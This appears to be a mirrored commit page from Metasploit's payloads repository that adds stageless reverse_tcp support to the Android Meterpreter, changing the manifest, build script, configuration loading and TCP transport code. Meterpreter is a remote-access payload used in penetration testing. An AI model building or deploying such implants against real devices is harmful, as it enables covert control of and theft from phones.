mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-12-15 02:35:54 +01:00
android stageless reverse_tcp
This commit is contained in:
Tim
parent
46d60d2c51
commit
8154ae317d
File diff suppressed because one or more lines are too long
@ -58,7 +58,7 @@
|
||||
</intent-filter>
|
||||
</receiver>
|
||||
|
||||
<service android:name=".MainService"/>
|
||||
<service android:name=".MainService" android:exported="true" />
|
||||
</application>
|
||||
|
||||
</manifest>
|
||||
|
||||
@ -145,6 +145,19 @@
|
||||
<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
|
||||
<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
|
||||
</exec>
|
||||
|
||||
<echo>Building stageless meterpreter</echo>
|
||||
<exec executable="${android.sdk.path}/platforms/android-3/tools/${dx.filename}" failonerror="true">
|
||||
<arg value="--verbose" />
|
||||
<arg value="--dex" />
|
||||
<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/meterpreter.dex" />
|
||||
<arg value="${project.basedir}/../app/target/classes" />
|
||||
<arg value="${project.basedir}/target/dx/meterpreter" />
|
||||
<arg value="${com.metasploit:Metasploit-Java-Meterpreter:jar}" />
|
||||
<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
|
||||
<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
|
||||
</exec>
|
||||
|
||||
</target>
|
||||
</configuration>
|
||||
</execution>
|
||||
|
||||
@ -125,6 +125,16 @@ public class AndroidMeterpreter extends Meterpreter {
|
||||
} catch (Exception e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
if (parameters.length > 1 && parameters[1].charAt(0) != ' ') {
|
||||
byte[] configBytes = Utils.hexStringToByteArray(parameters[1]);
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
} else {
|
||||
int configLen = in.readInt();
|
||||
byte[] configBytes = new byte[configLen];
|
||||
in.readFully(configBytes);
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
this.ignoreBlocks = in.readInt();
|
||||
}
|
||||
|
||||
this.intervalCollectionManager = new IntervalCollectionManager(getContext());
|
||||
this.intervalCollectionManager.start();
|
||||
|
||||
@ -43,12 +43,12 @@ public class Meterpreter {
|
||||
|
||||
|
||||
private final TransportList transports = new TransportList();
|
||||
private int ignoreBlocks = 0;
|
||||
protected int ignoreBlocks = 0;
|
||||
private byte[] uuid;
|
||||
private long sessionExpiry;
|
||||
|
||||
|
||||
private void loadConfiguration(DataInputStream in, OutputStream rawOut, byte[] configuration) throws MalformedURLException {
|
||||
protected void loadConfiguration(DataInputStream in, OutputStream rawOut, byte[] configuration) throws MalformedURLException {
|
||||
// socket handle is 4 bytes, followed by exit func, both of
|
||||
// which we ignore.
|
||||
int csr = 8;
|
||||
@ -159,20 +159,6 @@ public class Meterpreter {
|
||||
* @throws Exception
|
||||
*/
|
||||
public Meterpreter(DataInputStream in, OutputStream rawOut, boolean loadExtensions, boolean redirectErrors, boolean beginExecution) throws Exception {
|
||||
|
||||
int configLen = in.readInt();
|
||||
byte[] configBytes = new byte[configLen];
|
||||
in.readFully(configBytes);
|
||||
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
|
||||
// after the configuration block is a 32 bit integer that tells us
|
||||
// how many stages were wired into the payload. We need to stash this
|
||||
// because in the case of TCP comms, we need to skip this number of
|
||||
// blocks down the track when we reconnect. We have to store this in
|
||||
// the meterpreter class instead of the TCP comms class though
|
||||
this.ignoreBlocks = in.readInt();
|
||||
|
||||
this.loadExtensions = loadExtensions;
|
||||
this.commandManager = new CommandManager();
|
||||
this.channels.add(null); // main communication channel?
|
||||
@ -183,7 +169,21 @@ public class Meterpreter {
|
||||
errBuffer = null;
|
||||
err = System.err;
|
||||
}
|
||||
|
||||
if (beginExecution) {
|
||||
|
||||
int configLen = in.readInt();
|
||||
byte[] configBytes = new byte[configLen];
|
||||
in.readFully(configBytes);
|
||||
loadConfiguration(in, rawOut, configBytes);
|
||||
|
||||
// after the configuration block is a 32 bit integer that tells us
|
||||
// how many stages were wired into the payload. We need to stash this
|
||||
// because in the case of TCP comms, we need to skip this number of
|
||||
// blocks down the track when we reconnect. We have to store this in
|
||||
// the meterpreter class instead of the TCP comms class though
|
||||
this.ignoreBlocks = in.readInt();
|
||||
|
||||
startExecuting();
|
||||
}
|
||||
}
|
||||
|
||||
@ -199,6 +199,8 @@ public class TcpTransport extends Transport {
|
||||
this.inputStream.readFully(throwAway);
|
||||
}
|
||||
// and finally discard the block count
|
||||
this.inputStream.readInt();
|
||||
if (blocks > 0) {
|
||||
this.inputStream.readInt();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -38,4 +38,26 @@ public class Utils {
|
||||
|
||||
return "unknown";
|
||||
}
|
||||
|
||||
|
||||
public static String bytesToHex(byte bytes[]) {
|
||||
char[] hexDigits = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
|
||||
StringBuilder buf = new StringBuilder(bytes.length * 2);
|
||||
for (byte aByte : bytes) {
|
||||
buf.append(hexDigits[(aByte & 0xf0) >> 4]);
|
||||
buf.append(hexDigits[aByte & 0x0f]);
|
||||
}
|
||||
return buf.toString();
|
||||
}
|
||||
|
||||
public static byte[] hexStringToByteArray(String s) {
|
||||
int len = s.length();
|
||||
byte[] data = new byte[len / 2];
|
||||
for (int i = 0; i < len; i += 2) {
|
||||
data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
|
||||
+ Character.digit(s.charAt(i+1), 16));
|
||||
}
|
||||
return data;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
Loading…
Reference in New Issue
Block a user